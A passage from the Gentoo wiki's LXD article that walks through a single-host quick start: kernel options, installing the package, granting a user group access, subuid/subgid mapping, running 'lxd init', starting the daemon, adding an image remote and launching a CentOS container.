But, I am stuck in a very basic problem. How can I record RGB and depth video. I tried to save RGB and depth as .png files (as shown in colorBasics example, writing one .png color image) in each event handler method. But, it generates 6fps. How can I record RGB and depth video in 30fps speed? Do I need to use multi-threading? I don't know how to use it. Your help regarding this will be highly appreciated and very helpful for the beginners.
Thanks again.
Also, the RGB and depth images are not synchronous when I tried to write in this way. Means, for all RGB images, there may not be a similar depth image.
@Adam Victor See my post above. I believe that is the fix you are looking for.
Hi dan.
Thank you for all the tutorials, are very useful. I´m doing an school Project and i need to recognize some patterns like rectangles, circles and then know at what depht they are. Do you have some example of this or somewhere can i find something like this?. Thank you again for your tutorials, keep working like that.
@SFMID: If you are looking to analyze photos and do things like shape or object recognition, check out OpenCV -.
I am developing a kinect app which needs to be able to save the join positions at set intervals , depth won't matter though so I only need to store the x and y I thin , My initial Idea was to do this through image comparison but I want to use the skeleton data , any help much appreciated
Please, Could you update this sample for the latest SDK.. It's really great and it's helping a lot in my graduation project, but now it's giving me many warnings with new SDK. Could you please help?
Error 9 The name 'headImage' does not exist in the current
I am gettimg the same error for "leftEllipse" and "rightEllipse". Does anyone can help me debug this issue ?...
Any help is appreciated
Hi Dan,
I have a strange error with these constructor functions...
GetFirstSkeleton(e);
ScalePosition
GetCameraPoint(first, e);
All the same error "The Name dose not exist for the current context"
Hi Dan
The thing I do to the sample is to change the reference Microsoft.Kinect to a new version 1.7.0.0.Then I change KinectSkeletonViewer.xaml.cs as Mason told before.But I still get something problems.
Firstly, when I close the MainWindow by clicking the X at the righttop cornor,the image stop moving. However, the MainWindow is still there and can't be closed. In Windows Task Manager,it shows that the MainWindow is not responding. Only after I stop debugging, the window will be closed. So what's wrong with this? And what should I do?
Secondly, I get 6 warnings related to obsolete in line 128 131 134 140 144 148. For example:
'Microsoft.Kinect.DepthImageFrame.MapFromSkeletonPoint(Microsoft.Kinect.SkeletonPoint)' is obsolete: '"This method is replaced by Microsoft.Kinect.CoordinateMapper.MapSkeletonPointToDepthPoint"
I am new to C# so I don't know how to change that.However the program still goes well with the warning.
Remove this comment
Remove this threadclose | http://channel9.msdn.com/Series/KinectQuickstart/Skeletal-Tracking-Fundamentals?format=html5 | CC-MAIN-2013-20 | refinedweb | 4,509 | 58.58 |
MACD is a popularly used technical indicator in trading stocks, currencies, cryptocurrencies, etc.
MACD is used and discussed in many different trading circles. Moving Average Convergence Divergence (MACD) is a trend following indicator. MACD can be calculated very simply by subtracting the 26 period EMA from the 12 period EMA. We previously discussed EMAs in our article here. MACD can be used and interpreted in a handful of different ways to give the trader potential value and insight into their trading decisions.
MACD is commonly used by analyzing crossovers, divergences, and periods of steep slope (positive or negative). Along with the MACD line (from subtracting the 12 period EMA from the 16 period EMA) the chart commonly will include a signal line plotted on top of the MACD. This signal line is a 9 day EMA of the MACD.
In a bullish crossover, just like in Moving Averages, a buy signal occurs when MACD crosses above the signal line. A bearish signal occurs when MACD crosses below the signal line. If a crossover occurs with a high sloping MACD, this can be a sign of an overbought or oversold condition, depending on if the crossover is bullish or bearish respectively. MACD is a great indicator for understanding if movement in the price is strong or weak. A weak movement is likely to correct and a strong movement is likely to continue.
Divergences are also simple to understand. When the MACD establishes a high or low diverging from highs or lows in the price it establishes a divergence. A bullish divergence is in place when MACD has two rising lows on the MACD with two falling lows on the asset price. Divergences can be used to find a changing trend. Traders are always looking for the competitive edge and predicting a trend change can be very profitable. Of course, divergences are not completely reliable and should only be used as an additional piece of information, not a sole indication of price direction.
Steep slope can signal an overbought or oversold situation. In such a situation a stock’s trend is likely soon to lose steam and see a correction or reversal from current direction. other source of data you prefer.
import pandas as pd import numpy as np from datetime import datetime import matplotlib.pyplot as plt import pyEX as p ticker = 'AMD' timeframe = '6m' df = p.chartDF(ticker, timeframe) df = df[['close']] df.reset_index(level=0, inplace=True) df.columns=['ds','y'] plt.plot(df.ds, df.y, label='AMD') plt.show()
AMD from late 2018 to present date (early 2019).
exp1 = df.y.ewm(span=12, adjust=False).mean() exp2 = df.y.ewm(span=26, adjust=False).mean() macd = exp1-exp2 exp3 = macd.ewm(span=9, adjust=False).mean() plt.plot(df.ds, macd, label='AMD MACD', color = '#EBD2BE') plt.plot(df.ds, exp3, label='Signal Line', color='#E5A4CB') plt.legend(loc='upper left') plt.show()
This allows us to plot the MACD vs the signal line. See if you can spot the bullish and bearish crossovers!
MACD vs Signal Line
Check the graph below. Were you correct? Remember, a bullish crossover happens when the MACD crosses above the signal line and a bearish crossover happens when the MACD crosses below the signal line.
Bullish crossover represented in green, bearish crossover represented in red.
The above example was a simple way to use MACD to study crossovers. Next, let’s study strength and examine overbought or oversold conditions.
We start by implementing the exponential moving averages and MACD.
exp1 = df.y.ewm(span=12, adjust=False).mean() exp2 = df.y.ewm(span=26, adjust=False).mean() exp3 = df.y.ewm(span=9, adjust=False).mean() macd = exp1-exp2 plt.plot(df.ds, df.y, label='AMD') plt.plot(df.ds, macd, label='AMD MACD', color='orange') plt.plot(df.ds, exp3, label='Signal Line', color='Magenta') plt.legend(loc='upper left') plt.show()
Blue line represents the AMD stock price, orange line represents the MACD
We can blow this MACD line up a bit by plotting it separate from the stock price and see the steep slopes more clearly.
MACD from late 2018 to present date (early 2019).
Let’s recall our discussion of overbought and oversold from earlier. We can see the MACD stays pretty flat over time. But there are certain times where the MACD curve is steeper than others. These are instances of overbought or oversold conditions. We represent our oversold conditions with green circles and overbought with red circles. You can see that soon after the MACD shows an overbought or oversold condition the momentum slowed and the stock price reacted accordingly.
Green circles correspond to bullish divergence, red corresponds to bearish divergence
We briefly discussed MACD and implemented it in Python to examine its use in crossovers and overbought/oversold conditions. Hopefully this article helped you add another tool to your trading toolbox! | https://www.fmz.com/bbs-topic/3644 | CC-MAIN-2019-35 | refinedweb | 819 | 59.09 |
#include <LiquidCrystal.h>/* LiquidCrystal display with:LCD 4 (RS) to arduino pin 12LCD 5 (R/W) to ground (non-existent pin 14 okay?)LCD 6 (E) to arduino pin 11d4, d5, d6, d7 on arduino pins 7, 8, 9, 10*/LiquidCrystal lcd(12, 14, 11, 7, 8, 9, 10);void setup(){// position cursor on line x=4,y=3lcd.setCursor(3,2);// Print a message to the LCD.lcd.print("hello, world!");}void loop(){ }
LCD 5 (R/W) to ground (non-existent pin 14 okay?)
No begin nor init.
What i see is just like it's showing every pixel (a bunch of squares). Do i have burned something?
If you don't use this function the default initialization is for a '1-line' display.
#include <LiquidCrystal.h>LiquidCrystal lcd(12, 11, 5,4,3,2);void setup() {//here's the lcd.begin for my display (it's a 20x4)lcd.begin(20, 4);lcd.print("Hello Arduino!");}//let's print time passing by...void loop() {lcd.setCursor(0, 1);lcd.print(millis()/1000);}
Don't think it's a matter of contrast, since i grounded the contrast pin too and gave him directly 3.3V, nor with the trimmer.Another tip: do i have to put a resistance on the backlight led or it is already "slowed down"?
gave him directly 3.3V
Most HD44780-compatible lcds require ~4v (vs. Vdd) on the Vo for the contrast to work
You can check this by using a battery to create the negative voltage: put the battery's positive to ground and negative to the Vo pin. You will see very dark displayed on the lcd.
void setup() { pinMode(9, OUTPUT); // set up the LCD's number of columns and rows: lcd.begin(20, 4); analogWrite(9, 145); //let's try... // Print a message to the LCD. lcd.print("hello, world!");}
analogWrite(9, 20);
I'm having a trouble with a 20x4 LCD.
Obviously, every connection is made correctly.
I've got a trimmer (10KOhms) but i'm having same issue with this code ...
Man i tried all the stuff above, i even connected the contrast pin to a digital out (pin 9) to select the voltage... like that:
I think i burned something (like some driver, if there is any).
So, that is what i've done. sorry if it's a little bit confused, but this should clarify what i'm doing.Let me know what you think!
Quote from: altagest on Oct 09, 2012, 08:47 pmSo, that is what i've done. sorry if it's a little bit confused, but this should clarify what i'm doing.Let me know what you think!Open -> Liquid Crystal -> HelloWorld | http://forum.arduino.cc/index.php?topic=126214.msg949423 | CC-MAIN-2015-27 | refinedweb | 451 | 77.23 |
Do not use the same variable name in two scopes where one scope is contained in another. For example,
- No other variable should share the name of a global variable if the other variable is in a subscope of the global variable.
- A block should not declare a variable with the same name as a variable declared in any block that contains it.
Reusing variable names leads to programmer confusion about which variable is being modified. Additionally, if variable names are reused, generally one or both of the variable names are too generic.
Noncompliant Code Example
This noncompliant code example declares the
msg identifier at file scope and reuses the same identifier to declare a character array local to the
report_error() function. The programmer may unintentionally copy the function argument to the locally declared
msg array within the
report_error() function. Depending on the programmer's intention, it either fails to initialize the global variable
msg or allows the local
msg buffer to overflow by using the global value
msgsize as a bounds for the local buffer.
#include <stdio.h> static char msg[100]; static const size_t msgsize = sizeof( msg); void report_error(const char *str) { char msg[80]; snprintf(msg, msgsize, "Error: %s\n", str); /* ... */ } int main(void) { /* ... */ report_error("some error"); return 0; }
Compliant Solution
This compliant solution uses different, more descriptive variable names:
#include <stdio.h> static char message[100]; static const size_t message_size = sizeof( message); void report_error(const char *str) { char msg[80]; snprintf(msg, sizeof( msg), "Error: %s\n", str); /* ... */ } int main(void) { /* ... */ report_error("some error"); return 0; }
When the block is small, the danger of reusing variable names is mitigated by the visibility of the immediate declaration. Even in this case, however, variable name reuse is not desirable. In general, the larger the declarative region of an identifier, the more descriptive and verbose should be the name of the identifier.
By using different variable names globally and locally, the compiler forces the developer to be more precise and descriptive with variable names.
Noncompliant Code Example
This noncompliant code example declares two variables with the same identifier, but in slightly different scopes. The scope of the identifier
i declared in the
for loop's initial clause terminates after the closing curly brace of the for loop. The scope of the identifier i declared in the
for loop's compound statement terminates before the closing curly brace. Thus, the inner declaration of
i hides the outer declaration of
i, which can lead to unintentionally referencing the wrong object.
void f(void) { for (int i = 0; i < 10; i++) { long i; /* ... */ } }
Compliant Solution
This compliant solution uses a unique identifier for the variable declared within the
for loop.
void f(void) { for (int i = 0; i < 10; i++) { long j; /* ... */ } }
Exceptions
DCL01-C-EX1: A function argument in a function declaration may clash with a variable in a containing scope provided that when the function is defined, the argument has a name that clashes with no variables in any containing scopes.
extern int name; void f(char *name); /* Declaration: no problem here */ /* ... */ void f(char *arg) { /* Definition: no problem; arg doesn't hide name */ /* Use arg */ }
DCL01-C-EX2: A temporary variable within a new scope inside of a macro can override a surrounding identifier.
#define SWAP(type, a, b) do { type tmp = a; a = b; b = tmp; } while(0) void func(void) { int tmp = 100; int a = 10, b = 20; SWAP(int, a, b); /* Hidden redeclaration of tmp is acceptable */ }
Risk Assessment
Reusing a variable name in a subscope can lead to unintentionally referencing an incorrect variable.
Automated Detection
Related Vulnerabilities
Search for vulnerabilities resulting from the violation of this rule on the CERT website.
5 Comments
Robert Seacord (Manager)
The first NCE and CS should differ only in the specific violation being addressed by this guideline.
Dhruv Mohindra
Why aren't there any parentheses around
msgin these two lines:
The variable names in the CS have changed as compared to the NCE.
Also, the sentence "either failing to initialize the assign global variable,..." doesn't seem to need the word "assign".
David Svoboda
I rewrote the parragraph with the assign type you cite. While saying
sizeof msgis syntactically valid C, our styling conventions typically use parentheses after sizeof, which makes it look like a C function (although it is an operator, not a function.)
Martin Sebor
There are four kinds of scopes:
With the last three scopes always being "nested" in the file scope. I think it would be worthwhile to mention them in the introduction and explain the differences so that we can then formally refer to them in the examples.
David Svoboda
Agreed. I've no idea if this rule is meant to apply to names declared in both file scope and in a struct. (They could clash if the struct has methods, but that is not common inn C.) | https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152192 | CC-MAIN-2019-22 | refinedweb | 814 | 50.67 |
Warning: This was created with older versions of Ember.js and is likely no longer relevant. Please tread lightly when referencing this article.
Getting Facebook integrated into an existing website may sound daunting but using the Facebook UI API and Ember together was entirely too easy.
Ember-CLI has a directory called initializers that are loaded at app start up. This proves useful for things such as Google Analytics or Facebook SDK initialization.
Here is what my
facebook-sdk.js initializer looks like. Note the use of global FB. This is used so that JSHint doesn’t freak out when building the project.
/* global FB */ export default { name: 'facebook', initialize: function() { var fbAsyncInit = function() { FB.init({ appId : '<your app id>', xfbml : true, version : 'v2.2' }); }; ')); window.fbAsyncInit = fbAsyncInit; } };
Now I can use the global FB.ui in components with ease. So far I’ve only integrated the Facebook Send Dialogue into the application, but this alone can show how easy it is for the Facebook SDK to now integrate with your Ember Application.
/* global FB */ import Ember from 'ember'; export default Ember.Component.extend({ classNames: ['facebook-send'], actions: { sendLink: function() { FB.ui({ method: 'send', link: '', }); } } });
Check out what other pieces you could use in your Ember application by visiting the Facebook JS SDK Documentation
I need the url sent in the FB send dialogue to be relative to the environment I am in so I added a little mixin I can use throughout the site to generate proper links for each environment. Check it out!
import Ember from 'ember'; export default Ember.Mixin.create({ currentBaseUrl: function() { var pathArray = window.location.href.split( '/' ); return '%@//%@'.fmt(pathArray[0], pathArray[2]); }.property() });
Update: I expand on this post in a talk I gave for a SanDiego.js and San Diego Ember talk in February 2015. Watch it here or view the slides here | https://hbrysiewicz.com/2014-12-16-ember-facebook-components.html | CC-MAIN-2021-43 | refinedweb | 310 | 59.3 |
The
SQL::OOP provides an object oriented interface for generating SQL statements. This is an alternative to SQL::Abstract but doesn't require any complex syntactical hash structure. All you have to do is to call well-readable OOP methods. Moreover, if yo...JAMADAM/SQL-OOP-0.21 - 29 May 2014 12:49:49-OOP-0.36 - 08 Mar 2014 18:58:19 GMT - Search in distribution
Net::Moo is an OOP wrapper for the Moo.com API. OPTIONS Options are passed to Net::Moo using a Config::Simple object or a valid Config::Simple config file. Options are grouped by "block". moo * api_key String. *required* A valid Moo API key. * valida...ASCOPE/Net-Moo-0.11 - 19 Jun 2008 14:58:50 (1 review) - 10 Aug 2008 22:09:28 GMT - Search in distribution
OOP for reading and writing XBEL files. PACKAGE METHODS __PACKAGE__->new() Returns an *XML::XBEL* object. OBJECT METHODS $self->parse_file($file) Returns true or false. $self->parse_string($string) Returns true or false. $obj->new_document(\%args) Va...ASCOPE/XML-XBEL-1.4 - 02 Apr 2005 21:03:54 GMT - Search in distribution
OOP-ish interface to the Internet Topic Exchange. NOTES * The error handling sucks and will be addressed in future releases. PACKAGE METHODS __PACKAGE__->new($blogname) Returns an object.Woot! OBJECT METHODS Net::ITE $ite->topics() When called in a s...ASCOPE/Net-ITE.pm-0.05 - 20 Mar 2003 14:16:06 GMT - Search in distribution
Geowhat? A Geotude is : "permanent and hierarchical. [As] a trade-off: A Geotude is less intuitive than address, but more intuitive than latitude/longitude. A Geotude is more precise than address, but less precise than latitude/longitude." This packa...ASCOPE/Geo-Geotude-1.0 - 09 Aug 2007 02:05:13 GMT - Search in distribution
simply OOP I/F by the name. name space not tainted default. if Perl5.8 or higher then use File::stat. AUTHOR Shin Honda<lt>makoto@cpan.jp<gt> SEE ALSO stat. ...MAKOTO/File-Stat-0.01 - 24 Feb 2003 12:24:40 GMT - Search in distribution
CGI::FCKeditor is FCKeditor() Controller for Perl OOP. FCKeditor() is necessary though it is natural. METHODS new my $fck = CGI::FCKeditor->new(); Constructs instance. set_name $fck->set_name('fck'); ...SHIRAIWA/CGI-FCKeditor-0.02 - 01 Apr 2007 02:49:33 GMT - Search in distribution sits on top of all the MIDI modules -- notably MIDI::Score (so you should skim MIDI::Score) -- and is meant to serve as a basic interface to them, for composition. By composition, I mean composing anew; you can use this module to add to o...CONKLIN/MIDI-Perl-0.83 - 01 Feb 2013 22:06:14 GMT - Search in distribution
Provides a simple OOP-ish interface to the Google SOAP API ENCODING According to the Google API docs : "In order to support searching documents in multiple languages and character encodings the Google Web APIs perform all requests and responses in th...ASCOPE/Net-Google-1.0 - 03 Dec 2005 19:16:38
Date::Holidays is an aggregator of adapters exposing a uniform API to a set of modules either in the Date::Holidays::* namespace of elsewhere. All of these modules deliver methods and information on national calendars. The module seem to more or less...JONASBN/Date-Holidays-0.15 - 13 Mar 2007 20:04:50 GMT - Search in distribution
This is a marker package so distributions that are based on Class::Scaffold can require it. INSTALLATION See perlmodinstall for information and options on installing Perl modules. BUGS AND LIMITATIONS No bugs have been reported. Please report any bug...MARCEL/Class-Scaffold-1.102280 - 16 Aug 2010 16:46:43 GMT - Search in distribution | https://metacpan.org/search?q=OOP | CC-MAIN-2014-23 | refinedweb | 609 | 59.6 |
Applet componets not showing
Pat Peg
Ranch Hand
Joined: Feb 04, 2005
Posts: 195
posted
Feb 08, 2005 12:04:00
0
So, I build an
Applet
with text areas, button JcomboBoxes, etc. I put all these components in a
JPanel
called jPanel1. At the end I pop the panel on the container and everything worked great until I decided to have a selection from a
JComboBox
place one component, a
JTable
, on the panel.(Before I was just placing it directly on there without user input). It appears to remove the old component (a
JScrollPane
) but the table never shows. What do I need to do?
see code snippets below
//SelectPlan is the JComboBox SelectPlan.addActionListener(new java.awt.event.ActionListener(){ public void actionPerformed(java.awt.event.ActionEvent evt){ SelectPIDActionPerformed(evt); } }); jPanel1.add(SelectPlan);//add comboBox to panel; panel will be added to //conatiner later SelectPlan.setBounds(380, 10, 310, 19); ... .. . private void SelectPIDActionPerformed(java.awt.event.ActionEvent evt){ JComboBox jcb = (JComboBox)evt.getSource(); String pid = (String)jcb.getSelectedItem(); jPanel1.remove(jspPid); container.remove(jPanel1); pTable.setPreferredSize(new java.awt.Dimension(450, 150)); pTable.setVisible(true); jPanel1.add(pTable); pTable.setBounds(30, 62, 430, 150); container.add(jPanel1); container.repaint(); }
Craig Wood
Ranch Hand
Joined: Jan 14, 2004
Posts: 1535
posted
Feb 08, 2005 19:44:00
0
import java.awt.*; import java.awt.event.*; import javax.swing.*; public class ChangingComponents { JTable[] tables; JScrollPane scrollPane; public ChangingComponents() { createTables(); scrollPane = new JScrollPane(tables[0]); JFrame f = new JFrame(); f.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); f.getContentPane().add(getButtonPanel(), "North"); f.getContentPane().add(scrollPane); f.getContentPane().add(getComboPanel(), "South"); f.setSize(400,200); f.setLocation(200,200); f.setVisible(true); } private void createTables() { String[] headers = { "column 1", "column 2", "column 3", "column 4" }; String[] seeds = { "wolf", "cougar", "bison" }; tables = new JTable[seeds.length]; int rows = 4, cols = 4; for(int j = 0; j < seeds.length; j++) { Object[][] data = new Object[rows][cols]; for(int row = 0; row < rows; row++) for(int col = 0; col < cols; col++) data[row][col] = seeds[j] + " " + (row * cols + col + 1); tables[j] = new JTable(data, headers); } } private JPanel getButtonPanel() { JButton show = new JButton("show tables"); show.addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { printTableData(); } }); JPanel panel = new JPanel(); panel.add(show); return panel; } private void printTableData() { for(int j = 0; j < tables.length; j++) { System.out.println("\t**** table " + (j + 1) + " ****"); int rows = tables[j].getRowCount(); int cols = tables[j].getColumnCount(); for(int row = 0; row < rows; row++) { for(int col = 0; col < cols; col++) { System.out.print(tables[j].getValueAt(row, col)); if(col < cols - 1) System.out.print(", "); } System.out.println(); } } } private JPanel getComboPanel() { String[] items = { "wolves", "cougars", "bison" }; final JComboBox combo = new JComboBox(items); combo.addActionListener(new ActionListener() { int lastIndex = 0; // to remember who's showing public void actionPerformed(ActionEvent e) { int index = combo.getSelectedIndex(); scrollPane.remove(tables[lastIndex]); scrollPane.getViewport().setView(tables[index]); lastIndex = index; } }); JPanel panel = new JPanel(); panel.add(combo); return panel; } public static void main(String[]args) { new ChangingComponents(); } }
Pat Peg
Ranch Hand
Joined: Feb 04, 2005
Posts: 195
posted
Feb 09, 2005 07:12:00
0
I do not wish to seem ungrateful, I appreciate someone taking the time to answer.
Thank you Craig but�
I do not think the answer provided can be used in this case. The reason is that the tables (2 of them) have 10 columns and ,in worse case, 6000 rows (on average just around 1000) This would mean possibly storing 120,000 JTables. Even if the clients machine could handle this I don�t think it would be the best approach. I should have given more details when I first posted. My apologies.
I am implementing the code found on Sun�s web-site:
It seems to work great after modifying it to take the data from a database based on user selection in the applet. I just can�t seem to get it to appear in the beginning. If I build all my components from the start and populate the table with a hard coded selection so that when the entire container is started it knows to place a table at a certain location then everything works great. I can sort and re-sort.
If I draw everything from the beginning except the table and wait on the user to put in the parameters for the table then�.not so good
It seems to remove the component that I put in as a place holder for the table (a JscrollPane) but the table never appears.
Again, Thank you Craig for your input but if you, are someone else, could re-examine the issue with this new information I would appreciate it.
If I draw everything from the beginning except the table and wait on the user to put in the parameters for the table then�.not so good
Pat Peg
Ranch Hand
Joined: Feb 04, 2005
Posts: 195
posted
Feb 09, 2005 07:27:00
0
Update...disregard and thanks for the help. In backtracking to get back to the original code I fixed it so it does what I need it to now.
Ernest Friedman-Hill
author and iconoclast
Marshal
Joined: Jul 08, 2003
Posts: 24189
34
I like...
posted
Feb 09, 2005 07:28:00
0
If you add a component to a container after that container is physically visible on the screen, then you must call validate() on that container to force it to be laid out again, or the new component won't show up. Perhaps that's the problem you're having?
[Jess in Action]
[AskingGoodQuestions]
Pat Peg
Ranch Hand
Joined: Feb 04, 2005
Posts: 195
posted
Feb 09, 2005 08:47:00
0
Ernest,
you are a saint. After I thought I had fixed it I realized that it still wasn't working correctly. I was embarrassed to come back and admit it but then I saw your post. That seems to be the problem. Thanks for the tip on validate. I was using repaint and not getting anywhere.
Pat Peg
Ranch Hand
Joined: Feb 04, 2005
Posts: 195
posted
Feb 09, 2005 08:54:00
0
Hmmm, the table shows in a scrollPane but I can't use the scrollPane. Anythoughts on why or what would cause it?
I agree. Here's the link:
subject: Applet componets not showing
Similar Threads
Split Pane not working
Swing application using netBeans IDE
JPanel show / hide
How can I debug it ?
can't add to JPanel after removeAll() is triggered by another swing component
All times are in JavaRanch time: GMT-6 in summer, GMT-7 in winter
JForum
|
Paul Wheaton | http://www.coderanch.com/t/340074/GUI/java/Applet-componets-showing | CC-MAIN-2015-22 | refinedweb | 1,103 | 56.05 |
18 October 2012 11:05 [Source: ICIS news]
SINGAPORE (ICIS)--UAE’s Borouge plans to shut its 600,000 tonne/year ethane/propane cracker in December and its 1.5m tonne/year ethane cracker in Ruwais in January/February for maintenance for approximately a month each, a company spokesperson said on Thursday.
“We will have a turnaround in December for the Borouge 1 plants followed by another turnaround in January/February for the Borouge 2 plants,” the spokesperson said.
The dates are in line with the shutdown schedule of the producer’s derivative plants.
Both crackers are said to be operating at around 90-95% capacity currently, according to sources close to the company.
Traders said the turnarounds will have limited impact on Asia’s spot ethylene market, as there have been limited exports from ?xml:namespace>
Borouge is a joint venture between Abu Dhabi National Oil Company (Adn | http://www.icis.com/Articles/2012/10/18/9604942/uaes-borouge-to-shut-crackers-for-maintenance.html | CC-MAIN-2014-49 | refinedweb | 149 | 51.89 |
If you haven't had a chance to look at the new PivotViewer control for Silverlight, have a look here or here. The PivotViewer enables visitors of your website to search large amounts of data very easily. The control takes a lot of work out of your hands. Basically, you tell it to load a collection and the PivotViewer takes care of everything else. Like adding controls to enter search and sort criteria. It uses DeepZoom to show large amounts of images and animate between states.
PivotViewer
DeepZoom
Before you can start coding, you have download the control itself. The Silverlight control can be downloaded from the PivotViewer section on Silverlight.net. You also need the Silverlight Toolkit which can be found here.
To get your first PivotViewer control up and running, create a new Silverlight project in Visual Studio and add references to all 5 PivotViewer assemblies to the Silverlight project. These assemblies can be found in C:\Program Files\Microsoft SDKs\Silverlight\v4.0\PivotViewer\Jun10\Bin or C:\Program Files (x86)\Microsoft SDKs\Silverlight\v4.0\PivotViewer\Jun10\Bin on 64bit system.
In MainPage.xaml, add an XML namespace definition for the System.Windows.Pivot namespace and add the control to the LayoutRoot grid.
System.Windows.Pivot
LayoutRoot
<UserControl x:Class="PivotViewerGettingStarted.MainPage"
xmlns=""
xmlns:x=""
xmlns:
<Grid x:
<Pivot:PivotViewer x:
</Grid>
</UserControl>
Getting data in the PivotViewer control has to be done in CodeBehind. The PivotViewer contains a method LoadCollection which takes a URL to a .CXML file. This file can be stored anywhere on the web and can be accessed as log as there is a valid ClientAccessPolicy.xml file available. For demonstration purposes, there are a couple of collections available on the GetPivot.com site (at the end of this tutorial, I’ve added a list of these). I’ve used the AMG Movies Collection in this case.
LoadCollection
The LoadCollection method also needs a value for the state. Often this value is set to string.Empty.
LoadCollection
string.Empty
public MainPage(){
InitializeComponent();
Pivot.LoadCollection(
""
,string.Empty);
}
Take a look at the control running here.
While using the collection on GetPivot.com can be vary useful for demonstrations or learning how to develop with the PivotViewer, you won't use these collections in a real application. You will have to create a collection of your own. Have a look at this section of GetPivot.com about the Excel extension to create a collection.
PivotViewer
Another way to create a collection is to let your program take control and build collection runtime. I will explain this in my next tutorial.
If you can’t wait and want to learn more, read the developer section on.
On the GetPivot.com site, there are a few more .CXML collections to try. | http://www.codeproject.com/Articles/102867/Building-Your-First-PivotViewer-Application?msg=3661534 | CC-MAIN-2015-40 | refinedweb | 465 | 60.11 |
LXD
LXD is is a next generation system container manager..
For those new to container technology, it would be good to first read the "Virtualization Concepts" section of the LXC article.
Key features of LXD include:
- It prefers to launch unprivileged containers (secure by default).
- A command-line client (lxc) interacts with a daemon (lxd).
- Configuration is made intuitive and scriptable through cascading profiles.
- Configuration changes are performed with the lxc command (not config files).
- Multiple hosts can be federated together (with a certificate-based trust system).
- A federated setup means that containers can be launched on remote machines and live-migrated between hosts (using CRIU technology).
- It is usable as a standalone hypervisor or integrated with Openstack nova
Contents
- 1 Quick start (single host)
- 2 Configuration
- 3 Multi-host setup
- 4 Advanced features
- 5 Troubleshooting
- 6 See also
Quick start (single host)
Prepare the system
Kernel configuration
It is a good idea to have most kernel flags required by app-emulation/lxc and sys-process/criu.
root #
ebuild /usr/portage/app-emulation/lxc/lxc-1.1.2.ebuild setup
... * Checking for suitable kernel configuration options... * CONFIG_NETLINK_DIAG: needed for lxc-checkpoint * CONFIG_PACKET_DIAG: needed for lxc-checkpoint * CONFIG_INET_UDP_DIAG: needed for lxc-checkpoint * CONFIG_INET_TCP_DIAG: needed for lxc-checkpoint * CONFIG_UNIX_DIAG: needed for lxc-checkpoint * CONFIG_CHECKPOINT_RESTORE: needed for lxc-checkpoint * Please check to make sure these options are set correctly. * Failure to do so may cause unexpected problems. |ebuild /usr/portage/sys-process/criu/criu-1.6.1.ebuild setup ...
Do you have plans for running systemd-based unprivileged containers? You will probably need to enable the "Gentoo Linux -> Support for init systems, system and service managers -> systemd" (CONFIG_GENTOO_LINUX_INIT_SYSTEMD)
Emerge
root #
emerge --ask lxd
Authorize a non-privileged user
root #
usermod --append --groups lxd erik
This will allow a non-root user to interact with the control socket which is owned by the lxd unix group. For the group change to take effect, users may need to log out and log back in again.
Configure subuid/subgid
root #
usermod --add-subuids 1000000-1065535 root
root #
usermod --add-subgids 1000000-1065535 root
In this setup, the user 0-65535 on the container will actually be seen on the host system as user 1000000+uid and 1000000+gid. This protects the host system, since if any container managed to break out of its sandboxed namespace, it could interact with the host system only as a process with an unknown, very high UID/GID.
Usermod is part of sys-apps/shadow which is needed for the subuid/subgid functionality.
Setup storage and networking
root #
lxd init
Do you want to configure a new storage pool (yes/no) [default=yes]? Name of the new storage pool [default=default]: Name of the storage backend to use (dir, btrfs, lvm) [default=dir]: btrfs Create a new BTRFS pool (yes/no) [default=yes]? Would you like to use an existing block device (yes/no) [default=no]? Would you like to create a new subvolume for the BTRFS storage pool (yes/no) [default=yes]: Would you like LXD to be available over the network (yes/no) [default=no]? Would you like stale cached images to be updated automatically (yes/no) [default=yes]? Would you like to create a new network bridge (yes/no) [default=yes]? no LXD has been successfully configured.
Configure the bridge
If a new bridge was created by
lxd init, start it now.
root #
rc-service net.lxcbr0 start
If desired, the bridge can be configured to come up automatically in the runlevel.
root #
rc-update add net.lxcbr0 default
Start the daemon
For OpenRC users:
root #
rc-service lxd start
A systemd unit file has also been installed.
/etc/conf.d/lxd has a few available options related to debug output, but the defaults are adequate for this quick start.
Launch a container
Add an image repository at a remote called "images":
user $
lxc remote add images
This is an untrusted remote, which can be a source of images that have been published with the --public flag. Trusted remotes are also possible, and are used as container hosts and also to serve private images. This specific remote is not special to LXD; organizations may host their own images.
user $
lxc image list images:
+--------------------------------+--------------+--------+-------------------------+---------+-------------------------------+ | ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | UPLOAD DATE | +--------------------------------+--------------+--------+-------------------------+---------+-------------------------------+ | | 3ae185265c53 | yes | Centos 6 (amd64) | x86_64 | Aug 29, 2015 at 10:17pm (CDT) | | | 369ac13f390e | yes | Centos 6 (amd64) | x86_64 | Sep 3, 2015 at 12:17pm (CDT) | | centos/6/amd64 (1 more) | 8e54c679f1c2 | yes | Centos 6 (amd64) | x86_64 | Sep 3, 2015 at 10:17pm (CDT) | | | 755542362bbb | yes | Centos 6 (i386) | i686 | Aug 29, 2015 at 10:19pm (CDT) | | | b4d26dbc6567 | yes | Centos 6 (i386) | i686 | Sep 3, 2015 at 12:20pm (CDT) | | centos/6/i386 (1 more) | 21eeba48a2d4 | yes | Centos 6 (i386) | i686 | Sep 3, 2015 at 10:19pm (CDT) | | | 9fe7ffdbc0ae | yes | Centos 7 (amd64) | x86_64 | Aug 29, 2015 at 10:22pm (CDT) | | | d750b910e62d | yes | Centos 7 (amd64) | x86_64 | Sep 3, 2015 at 12:23pm (CDT) | | centos/7/amd64 (1 more) | 06c4e5c21707 | yes | Centos 7 (amd64) | x86_64 | Sep 3, 2015 at 10:22pm (CDT) | | | ee229d68be51 | yes | Debian jessie (amd64) | x86_64 | Aug 29, 2015 at 6:29pm (CDT) | | | 69e457e1f4ab | yes | Debian jessie (amd64) | x86_64 | Sep 2, 2015 at 6:34pm (CDT) | | debian/jessie/amd64 (1 more) | 2ddd14ff9422 | yes | Debian jessie (amd64) | x86_64 | Sep 3, 2015 at 6:30pm (CDT) | | | 9fac01d1e773 | yes | Debian jessie (armel) | armv7l | Aug 31, 2015 at 7:24pm (CDT) | | | 67f4fedafd2f | yes | Debian jessie (armel) | armv7l | Sep 1, 2015 at 7:24pm (CDT) | ...
There are Gentoo images in the list, although they are not maintained by the Gentoo project. LXC users may recognize these images as the same ones available using the "download" template.
user $
lxc launch images:centos/6/amd64 mycentos6
